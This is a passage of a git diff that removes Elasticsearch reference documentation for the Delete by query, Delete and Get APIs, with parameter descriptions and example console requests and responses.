a role in -keeping this system behaving correctly. This document also doesn't cover known and important -bugs (both closed and open). We recognize that https://github.com/elastic/elasticsearch/issues?q=label%3Aresiliency[GitHub is hard to keep up with]. -To help people stay on top of those, we maintain a dedicated https://www.elastic.co/guide/en/elasticsearch/resiliency/current/index.html[resiliency page] -on our website. We strongly advise reading it. diff --git a/docs/reference/docs/delete-by-query.asciidoc b/docs/reference/docs/delete-by-query.asciidoc deleted file mode 100644 index 43f423018b9..00000000000 --- a/docs/reference/docs/delete-by-query.asciidoc +++ /dev/null @@ -1,691 +0,0 @@ -[[docs-delete-by-query]] -=== Delete by query API -++++ -Delete by query -++++ - -Deletes documents that match the specified query. 
- -[source,console] --------------------------------------------------- -POST /my-index-000001/_delete_by_query -{ - "query": { - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -//// - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "deleted": 119, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "total": 119, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 147/"took" : "$body.took"/] -//// - -[[docs-delete-by-query-api-request]] -==== {api-request-title} - -`POST //_delete_by_query` - -[[docs-delete-by-query-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** `read` -** `delete` or `write` - -[[docs-delete-by-query-api-desc]] -==== {api-description-title} - -You can specify the query criteria in the request URI or the request body -using the same syntax as the <>. - -When you submit a delete by query request, {es} gets a snapshot of the data stream or index -when it begins processing the request and deletes matching documents using -`internal` versioning. If a document changes between the time that the -snapshot is taken and the delete operation is processed, it results in a version -conflict and the delete operation fails. - -NOTE: Documents with a version equal to 0 cannot be deleted using delete by -query because `internal` versioning does not support 0 as a valid -version number. - -While processing a delete by query request, {es} performs multiple search -requests sequentially to find all of the matching documents to delete. A bulk -delete request is performed for each batch of matching documents. If a -search or bulk request is rejected, the requests are retried up to 10 times, with -exponential back off. If the maximum retry limit is reached, processing halts -and all failed requests are returned in the response. Any delete requests that -completed successfully still stick, they are not rolled back. - -You can opt to count version conflicts instead of halting and returning by -setting `conflicts` to `proceed`. - -===== Refreshing shards - -Specifying the `refresh` parameter refreshes all shards involved in the delete -by query once the request completes. This is different than the delete API's -`refresh` parameter, which causes just the shard that received the delete -request to be refreshed. Unlike the delete API, it does not support -`wait_for`. - -[[docs-delete-by-query-task-api]] -===== Running delete by query asynchronously - -If the request contains `wait_for_completion=false`, {es} -performs some preflight checks, launches the request, and returns a -<> you can use to cancel or get the status of the task. {es} creates a -record of this task as a document at `.tasks/task/${taskId}`. When you are -done with a task, you should delete the task document so {es} can reclaim the -space. - -===== Waiting for active shards - -`wait_for_active_shards` controls how many copies of a shard must be active -before proceeding with the request. See <> -for details. `timeout` controls how long each write request waits for unavailable -shards to become available. Both work exactly the way they work in the -<>. 
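-
-For example, the following sketch requires at least two active shard copies
-and gives each write request up to 90 seconds to find them (the index name
-and values are purely illustrative):
-
-[source,console]
---------------------------------------------------
-POST /my-index-000001/_delete_by_query?wait_for_active_shards=2&timeout=90s
-{
-  "query": {
-    "match": {
-      "user.id": "elkbee"
-    }
-  }
-}
---------------------------------------------------
-// TEST[skip:illustrative sketch]
-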
Delete by query uses scrolled searches, so you can also -specify the `scroll` parameter to control how long it keeps the search context -alive, for example `?scroll=10m`. The default is 5 minutes. - -===== Throttling delete requests - -To control the rate at which delete by query issues batches of delete operations, -you can set `requests_per_second` to any positive decimal number. This pads each -batch with a wait time to throttle the rate. Set `requests_per_second` to `-1` -to disable throttling. - -Throttling uses a wait time between batches so that the internal scroll requests -can be given a timeout that takes the request padding into account. The padding -time is the difference between the batch size divided by the -`requests_per_second` and the time spent writing. By default the batch size is -`1000`, so if `requests_per_second` is set to `500`: - -[source,txt] --------------------------------------------------- -target_time = 1000 / 500 per second = 2 seconds -wait_time = target_time - write_time = 2 seconds - .5 seconds = 1.5 seconds --------------------------------------------------- - -Since the batch is issued as a single `_bulk` request, large batch sizes -cause {es} to create many requests and wait before starting the next set. -This is "bursty" instead of "smooth". - -[[docs-delete-by-query-slice]] -===== Slicing - -Delete by query supports <> to parallelize the -delete process. This can improve efficiency and provide a -convenient way to break the request down into smaller parts. - -Setting `slices` to `auto` chooses a reasonable number for most data streams and indices. -If you're slicing manually or otherwise tuning automatic slicing, keep in mind -that: - -* Query performance is most efficient when the number of `slices` is equal to -the number of shards in the index or backing index. If that number is large (for example, -500), choose a lower number as too many `slices` hurts performance. Setting -`slices` higher than the number of shards generally does not improve efficiency -and adds overhead. - -* Delete performance scales linearly across available resources with the -number of slices. - -Whether query or delete performance dominates the runtime depends on the -documents being reindexed and cluster resources. - -[[docs-delete-by-query-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams or indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[docs-delete-by-query-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -`conflicts`:: - (Optional, string) What to do if delete by query hits version conflicts: - `abort` or `proceed`. Defaults to `abort`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=max_docs] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=request_cache] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=requests_per_second] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll_size] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search_type] - -`search_timeout`:: -(Optional, <>) -Explicit timeout for each search request. -Defaults to no timeout. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=slices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=sort] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stats] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] - -`timeout`:: -(Optional, <>) -Period each deletion request <>. Defaults to `1m` (one minute). - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[docs-delete-by-query-api-request-body]] -==== {api-request-body-title} - -`query`:: - (Optional, <>) Specifies the documents to delete - using the <>. - - -[[docs-delete-by-query-api-response-body]] -==== Response body - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /my-index-000001/_delete_by_query -{ - "query": { <1> - "match": { - "user.id": "elkbee" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -////////////////////////// - -The JSON response looks like this: - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "total": 119, - "deleted": 119, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/: [0-9]+/: $body.$_path/] - -`took`:: - -The number of milliseconds from start to end of the whole operation. - -`timed_out`:: - -This flag is set to `true` if any of the requests executed during the -delete by query execution has timed out. - -`total`:: - -The number of documents that were successfully processed. - -`deleted`:: - -The number of documents that were successfully deleted. - -`batches`:: - -The number of scroll responses pulled back by the delete by query. - -`version_conflicts`:: - -The number of version conflicts that the delete by query hit. - -`noops`:: - -This field is always equal to zero for delete by query. 
It only exists -so that delete by query, update by query, and reindex APIs return responses - with the same structure. - -`retries`:: - -The number of retries attempted by delete by query. `bulk` is the number -of bulk actions retried, and `search` is the number of search actions retried. - -`throttled_millis`:: - -Number of milliseconds the request slept to conform to `requests_per_second`. - -`requests_per_second`:: - -The number of requests per second effectively executed during the delete by query. - -`throttled_until_millis`:: - -This field should always be equal to zero in a `_delete_by_query` response. It only -has meaning when using the <>, where it -indicates the next time (in milliseconds since epoch) a throttled request will be -executed again in order to conform to `requests_per_second`. - -`failures`:: - -Array of failures if there were any unrecoverable errors during the process. If -this is non-empty then the request aborted because of those failures. -Delete by query is implemented using batches, and any failure causes the entire -process to abort but all failures in the current batch are collected into the -array. You can use the `conflicts` option to prevent reindex from aborting on -version conflicts. - -[[docs-delete-by-query-api-example]] -==== {api-examples-title} - -Delete all documents from the `my-index-000001` data stream or index: - -[source,console] --------------------------------------------------- -POST my-index-000001/_delete_by_query?conflicts=proceed -{ - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Delete documents from multiple data streams or indices: - -[source,console] --------------------------------------------------- -POST /my-index-000001,my-index-000002/_delete_by_query -{ - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -Limit the delete by query operation to shards that a particular routing -value: - -[source,console] --------------------------------------------------- -POST my-index-000001/_delete_by_query?routing=1 -{ - "query": { - "range" : { - "age" : { - "gte" : 10 - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -By default `_delete_by_query` uses scroll batches of 1000. 
You can change the -batch size with the `scroll_size` URL parameter: - -[source,console] --------------------------------------------------- -POST my-index-000001/_delete_by_query?scroll_size=5000 -{ - "query": { - "term": { - "user.id": "kimchy" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[docs-delete-by-query-manual-slice]] -===== Slice manually - -Slice a delete by query manually by providing a slice id and total number of -slices: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_delete_by_query -{ - "slice": { - "id": 0, - "max": 2 - }, - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} -POST my-index-000001/_delete_by_query -{ - "slice": { - "id": 1, - "max": 2 - }, - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you can verify works with: - -[source,console] ----------------------------------------------------------------- -GET _refresh -POST my-index-000001/_search?size=0&filter_path=hits.total -{ - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total" : { - "value": 0, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -[discrete] -[[docs-delete-by-query-automatic-slice]] -===== Use automatic slicing - -You can also let delete-by-query automatically parallelize using -<> to slice on `_id`. Use `slices` to specify -the number of slices to use: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_delete_by_query?refresh&slices=5 -{ - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you also can verify works with: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_search?size=0&filter_path=hits.total -{ - "query": { - "range": { - "http.response.bytes": { - "lt": 2000000 - } - } - } -} ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total" : { - "value": 0, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -Setting `slices` to `auto` will let {es} choose the number of slices -to use. This setting will use one slice per shard, up to a certain limit. If -there are multiple source data streams or indices, it will choose the number of slices based -on the index or backing index with the smallest number of shards. - -Adding `slices` to `_delete_by_query` just automates the manual process used in -the section above, creating sub-requests which means it has some quirks: - -* You can see these requests in the -<>. These sub-requests are "child" -tasks of the task for the request with `slices`. 
-* Fetching the status of the task for the request with `slices` only contains -the status of completed slices. -* These sub-requests are individually addressable for things like cancellation -and rethrottling. -* Rethrottling the request with `slices` will rethrottle the unfinished -sub-request proportionally. -* Canceling the request with `slices` will cancel each sub-request. -* Due to the nature of `slices` each sub-request won't get a perfectly even -portion of the documents. All documents will be addressed, but some slices may -be larger than others. Expect larger slices to have a more even distribution. -* Parameters like `requests_per_second` and `max_docs` on a request with -slices` are distributed proportionally to each sub-request. Combine that with -the point above about distribution being uneven and you should conclude that -using `max_docs` with `slices` might not result in exactly `max_docs` documents -being deleted. -* Each sub-request gets a slightly different snapshot of the source data stream or index -though these are all taken at approximately the same time. - -[discrete] -[[docs-delete-by-query-rethrottle]] -===== Change throttling for a request - -The value of `requests_per_second` can be changed on a running delete by query -using the `_rethrottle` API. Rethrottling that speeds up the -query takes effect immediately but rethrotting that slows down the query -takes effect after completing the current batch to prevent scroll -timeouts. - -[source,console] --------------------------------------------------- -POST _delete_by_query/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1 --------------------------------------------------- - -Use the <> to get the task ID. Set `requests_per_second` -to any positive decimal value or `-1` to disable throttling. - -===== Get the status of a delete by query operation - -Use the <> to get the status of a delete by query -operation: - - -[source,console] --------------------------------------------------- -GET _tasks?detailed=true&actions=*/delete/byquery --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -The response looks like: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "r1A2WoRbTwKZ516z6NEs5A" : { - "name" : "r1A2WoR", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "attributes" : { - "testattr" : "test", - "portsfile" : "true" - }, - "tasks" : { - "r1A2WoRbTwKZ516z6NEs5A:36619" : { - "node" : "r1A2WoRbTwKZ516z6NEs5A", - "id" : 36619, - "type" : "transport", - "action" : "indices:data/write/delete/byquery", - "status" : { <1> - "total" : 6154, - "updated" : 0, - "created" : 0, - "deleted" : 3500, - "batches" : 36, - "version_conflicts" : 0, - "noops" : 0, - "retries": 0, - "throttled_millis": 0 - }, - "description" : "" - } - } - } - } -} --------------------------------------------------- - -<1> This object contains the actual status. It is just like the response JSON -with the important addition of the `total` field. `total` is the total number -of operations that the reindex expects to perform. You can estimate the -progress by adding the `updated`, `created`, and `deleted` fields. The request -will finish when their sum is equal to the `total` field. 
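-
-For the sample status above, that sum is `0 + 0 + 3500 = 3500` out of a
-`total` of `6154`, so the operation is roughly 57% complete.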
- -With the task id you can look up the task directly: - -[source,console] --------------------------------------------------- -GET /_tasks/r1A2WoRbTwKZ516z6NEs5A:36619 --------------------------------------------------- -// TEST[catch:missing] - -The advantage of this API is that it integrates with `wait_for_completion=false` -to transparently return the status of completed tasks. If the task is completed -and `wait_for_completion=false` was set on it then it'll come back with -`results` or an `error` field. The cost of this feature is the document that -`wait_for_completion=false` creates at `.tasks/task/${taskId}`. It is up to -you to delete that document. - - -[discrete] -[[docs-delete-by-query-cancel-task-api]] -===== Cancel a delete by query operation - -Any delete by query can be canceled using the <>: - -[source,console] --------------------------------------------------- -POST _tasks/r1A2WoRbTwKZ516z6NEs5A:36619/_cancel --------------------------------------------------- - -The task ID can be found using the <>. - -Cancellation should happen quickly but might take a few seconds. The task status -API above will continue to list the delete by query task until this task checks that it -has been cancelled and terminates itself. diff --git a/docs/reference/docs/delete.asciidoc b/docs/reference/docs/delete.asciidoc deleted file mode 100644 index 04d70a1d1be..00000000000 --- a/docs/reference/docs/delete.asciidoc +++ /dev/null @@ -1,208 +0,0 @@ -[[docs-delete]] -=== Delete API -++++ -Delete -++++ - -Removes a JSON document from the specified index. - -[[docs-delete-api-request]] -==== {api-request-title} - -`DELETE //_doc/<_id>` - -[[docs-delete-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `delete` or -`write` <> for the target index or -index alias. - -[[docs-delete-api-desc]] -==== {api-description-title} - -You use DELETE to remove a document from an index. You must specify the -index name and document ID. - -NOTE: You cannot send deletion requests directly to a data stream. To delete a -document in a data stream, you must target the backing index containing the -document. See <>. - -[discrete] -[[optimistic-concurrency-control-delete]] -===== Optimistic concurrency control - -Delete operations can be made conditional and only be performed if the last -modification to the document was assigned the sequence number and primary -term specified by the `if_seq_no` and `if_primary_term` parameters. If a -mismatch is detected, the operation will result in a `VersionConflictException` -and a status code of 409. See <> for more details. - -[discrete] -[[delete-versioning]] -===== Versioning - -Each document indexed is versioned. When deleting a document, the `version` can -be specified to make sure the relevant document we are trying to delete is -actually being deleted and it has not changed in the meantime. Every write -operation executed on a document, deletes included, causes its version to be -incremented. The version number of a deleted document remains available for a -short time after deletion to allow for control of concurrent operations. The -length of time for which a deleted document's version remains available is -determined by the `index.gc_deletes` index setting and defaults to 60 seconds. - -[discrete] -[[delete-routing]] -===== Routing - -If routing is used during indexing, the routing value also needs to be -specified to delete a document. 
- -If the `_routing` mapping is set to `required` and no routing value is -specified, the delete API throws a `RoutingMissingException` and rejects -the request. - -For example: - - -//// -Example to delete with routing - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1?routing=shard-1 -{ - "test": "test" -} --------------------------------------------------- -//// - - -[source,console] --------------------------------------------------- -DELETE /my-index-000001/_doc/1?routing=shard-1 --------------------------------------------------- -// TEST[continued] - -This request deletes the document with id `1`, but it is routed based on the -user. The document is not deleted if the correct routing is not specified. - -[discrete] -[[delete-index-creation]] -===== Automatic index creation - -If an <> is used, -the delete operation automatically creates the specified index if it does not -exist. For information about manually creating indices, see -<>. - -[discrete] -[[delete-distributed]] -===== Distributed - -The delete operation gets hashed into a specific shard id. It then gets -redirected into the primary shard within that id group, and replicated -(if needed) to shard replicas within that id group. - -[discrete] -[[delete-wait-for-active-shards]] -===== Wait for active shards - -When making delete requests, you can set the `wait_for_active_shards` -parameter to require a minimum number of shard copies to be active -before starting to process the delete request. See -<> for further details and a usage -example. - -[discrete] -[[delete-refresh]] -===== Refresh - -Control when the changes made by this request are visible to search. See -<>. - -[discrete] -[[delete-timeout]] -===== Timeout - -The primary shard assigned to perform the delete operation might not be -available when the delete operation is executed. Some reasons for this -might be that the primary shard is currently recovering from a store -or undergoing relocation. By default, the delete operation will wait on -the primary shard to become available for up to 1 minute before failing -and responding with an error. The `timeout` parameter can be used to -explicitly specify how long it waits. Here is an example of setting it -to 5 minutes: - -[source,console] --------------------------------------------------- -DELETE /my-index-000001/_doc/1?timeout=5m --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-delete-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the target index. - -`<_id>`:: -(Required, string) Unique identifier for the document. - -[[docs-delete-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_seq_no] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_primary_term] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`timeout`:: -(Optional, <>) -Period to <>. Defaults to -`1m` (one minute). 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=doc-version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[docs-delete-api-example]] -==== {api-examples-title} - -Delete the JSON document `1` from the `my-index-000001` index: - -[source,console] --------------------------------------------------- -DELETE /my-index-000001/_doc/1 --------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - }, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 2, - "_primary_term": 1, - "_seq_no": 5, - "result": "deleted" -} --------------------------------------------------- -// TESTRESPONSE[s/"successful": 2/"successful": 1/] -// TESTRESPONSE[s/"_primary_term": 1/"_primary_term": $body._primary_term/] -// TESTRESPONSE[s/"_seq_no": 5/"_seq_no": $body._seq_no/] diff --git a/docs/reference/docs/get.asciidoc b/docs/reference/docs/get.asciidoc deleted file mode 100644 index 2ce71c2692f..00000000000 --- a/docs/reference/docs/get.asciidoc +++ /dev/null @@ -1,429 +0,0 @@ -[[docs-get]] -=== Get API -++++ -Get -++++ - -Retrieves the specified JSON document from an index. - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0 --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-get-api-request]] -==== {api-request-title} - -`GET /_doc/<_id>` - -`HEAD /_doc/<_id>` - -`GET /_source/<_id>` - -`HEAD /_source/<_id>` - -[[docs-get-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-get-api-desc]] -==== {api-description-title} -You use GET to retrieve a document and its source or stored fields from a -particular index. Use HEAD to verify that a document exists. You can -use the `_source` resource retrieve just the document source or verify -that it exists. - -[discrete] -[[realtime]] -===== Realtime - -By default, the get API is realtime, and is not affected by the refresh -rate of the index (when data will become visible for search). In case where -stored fields are requested (see `stored_fields` parameter) and the document -has been updated but is not yet refreshed, the get API will have to parse -and analyze the source to extract the stored fields. In order to disable -realtime GET, the `realtime` parameter can be set to `false`. - -[discrete] -[[get-source-filtering]] -===== Source filtering - -By default, the get operation returns the contents of the `_source` field unless -you have used the `stored_fields` parameter or if the `_source` field is disabled. -You can turn off `_source` retrieval by using the `_source` parameter: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0?_source=false --------------------------------------------------- -// TEST[setup:my_index] - -If you only need one or two fields from the `_source`, use the `_source_includes` -or `_source_excludes` parameters to include or filter out particular fields. -This can be especially helpful with large documents where partial retrieval can -save on network overhead. Both parameters take a comma separated list -of fields or wildcard expressions. 
Example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0?_source_includes=*.id&_source_excludes=entities --------------------------------------------------- -// TEST[setup:my_index] - -If you only want to specify includes, you can use a shorter notation: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0?_source=*.id --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[get-routing]] -===== Routing - -If routing is used during indexing, the routing value also needs to be -specified to retrieve a document. For example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/2?routing=user1 --------------------------------------------------- -// TEST[continued] - -This request gets the document with id `2`, but it is routed based on the -user. The document is not fetched if the correct routing is not specified. - -[discrete] -[[preference]] -===== Preference - -Controls a `preference` of which shard replicas to execute the get -request on. By default, the operation is randomized between the shard -replicas. - -The `preference` can be set to: - -`_local`:: - The operation will prefer to be executed on a local - allocated shard if possible. - -Custom (string) value:: - A custom value will be used to guarantee that - the same shards will be used for the same custom value. This can help - with "jumping values" when hitting different shards in different refresh - states. A sample value can be something like the web session id, or the - user name. - -[discrete] -[[get-refresh]] -===== Refresh - -The `refresh` parameter can be set to `true` in order to refresh the -relevant shard before the get operation and make it searchable. Setting -it to `true` should be done after careful thought and verification that -this does not cause a heavy load on the system (and slows down -indexing). - -[discrete] -[[get-distributed]] -===== Distributed - -The get operation gets hashed into a specific shard id. It then gets -redirected to one of the replicas within that shard id and returns the -result. The replicas are the primary shard and its replicas within that -shard id group. This means that the more replicas we have, the -better GET scaling we will have. - -[discrete] -[[get-versioning]] -===== Versioning support - -You can use the `version` parameter to retrieve the document only if -its current version is equal to the specified one. - -Internally, Elasticsearch has marked the old document as deleted and added an -entirely new document. The old version of the document doesn’t disappear -immediately, although you won’t be able to access it. Elasticsearch cleans up -deleted documents in the background as you continue to index more data. - -[[docs-get-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the index that contains the document. - -`<_id>`:: -(Required, string) Unique identifier of the document. - -[[docs-get-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -`refresh`:: -(Optional, Boolean) -If `true`, {es} refreshes the affected shards to make this operation visible to -search. If `false`, do nothing with refreshes. Defaults to `false`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stored_fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=doc-version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -[[docs-get-api-response-body]] -==== {api-response-body-title} - -`_index`:: -The name of the index the document belongs to. - -`_type`:: -The document type. {es} indices now support a single document type, `_doc`. - -`_id`:: -The unique identifier for the document. - -`_version`:: -The document version. Incremented each time the document is updated. - -`_seq_no`:: -The sequence number assigned to the document for the indexing -operation. Sequence numbers are used to ensure an older version of a document -doesn’t overwrite a newer version. See <>. - -`_primary_term`:: -The primary term assigned to the document for the indexing operation. -See <>. - -`found`:: -Indicates whether the document exists: `true` or `false`. - -`_routing`:: -The explicit routing, if set. - -'_source':: -If `found` is `true`, contains the document data formatted in JSON. -Excluded if the `_source` parameter is set to `false` or the `stored_fields` -parameter is set to `true`. - -'_fields':: -If the `stored_fields` parameter is set to `true` and `found` is -`true`, contains the document fields stored in the index. - -[[docs-get-api-example]] -==== {api-examples-title} - -Retrieve the JSON document with the `_id` 0 from the `my-index-000001` index: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/0 --------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "0", - "_version": 1, - "_seq_no": 0, - "_primary_term": 1, - "found": true, - "_source": { - "@timestamp": "2099-11-15T14:12:12", - "http": { - "request": { - "method": "get" - }, - "response": { - "status_code": 200, - "bytes": 1070000 - }, - "version": "1.1" - }, - "source": { - "ip": "127.0.0.1" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no": $body._seq_no/ s/"_primary_term": 1/"_primary_term": $body._primary_term/] - -Check to see if a document with the `_id` 0 exists: - -[source,console] --------------------------------------------------- -HEAD my-index-000001/_doc/0 --------------------------------------------------- -// TEST[setup:my_index] - -{es} returns a status code of `200 - OK` if the document exists, or -`404 - Not Found` if it doesn't. - -[discrete] -[[_source]] -===== Get the source field only - -Use the `/_source/` resource to get -just the `_source` field of a document. 
For example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_source/1 --------------------------------------------------- -// TEST[continued] - -You can use the source filtering parameters to control which parts of the -`_source` are returned: - -[source,console] --------------------------------------------------- -GET my-index-000001/_source/1/?_source_includes=*.id&_source_excludes=entities --------------------------------------------------- -// TEST[continued] - -You can use HEAD with the `_source` endpoint to efficiently -test whether or not the document _source exists. A document's source is not -available if it is disabled in the <>. - -[source,console] --------------------------------------------------- -HEAD my-index-000001/_source/1 --------------------------------------------------- -// TEST[continued] - -[discrete] -[[get-stored-fields]] -===== Get stored fields - -Use the `stored_fields` parameter to specify the set of stored fields you want -to retrieve. Any requested fields that are not stored are ignored. -Consider for instance the following mapping: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "counter": { - "type": "integer", - "store": false - }, - "tags": { - "type": "keyword", - "store": true - } - } - } -} --------------------------------------------------- - -Now we can add a document: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "counter": 1, - "tags": [ "production" ] -} --------------------------------------------------- -// TEST[continued] - -And then try to retrieve it: - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/1?stored_fields=tags,counter --------------------------------------------------- -// TEST[continued] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no" : 22, - "_primary_term" : 1, - "found": true, - "fields": { - "tags": [ - "production" - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -Field values fetched from the document itself are always returned as an array. -Since the `counter` field is not stored, the get request ignores it. 
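If you do need the value of a field that is not stored, you can usually fall back to source filtering instead of `stored_fields`. For example, a minimal sketch that reads the `counter` value from the `_source` of the document indexed above:

[source,console]
--------------------------------------------------
GET my-index-000001/_doc/1?_source_includes=counter
--------------------------------------------------
// TEST[continued]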
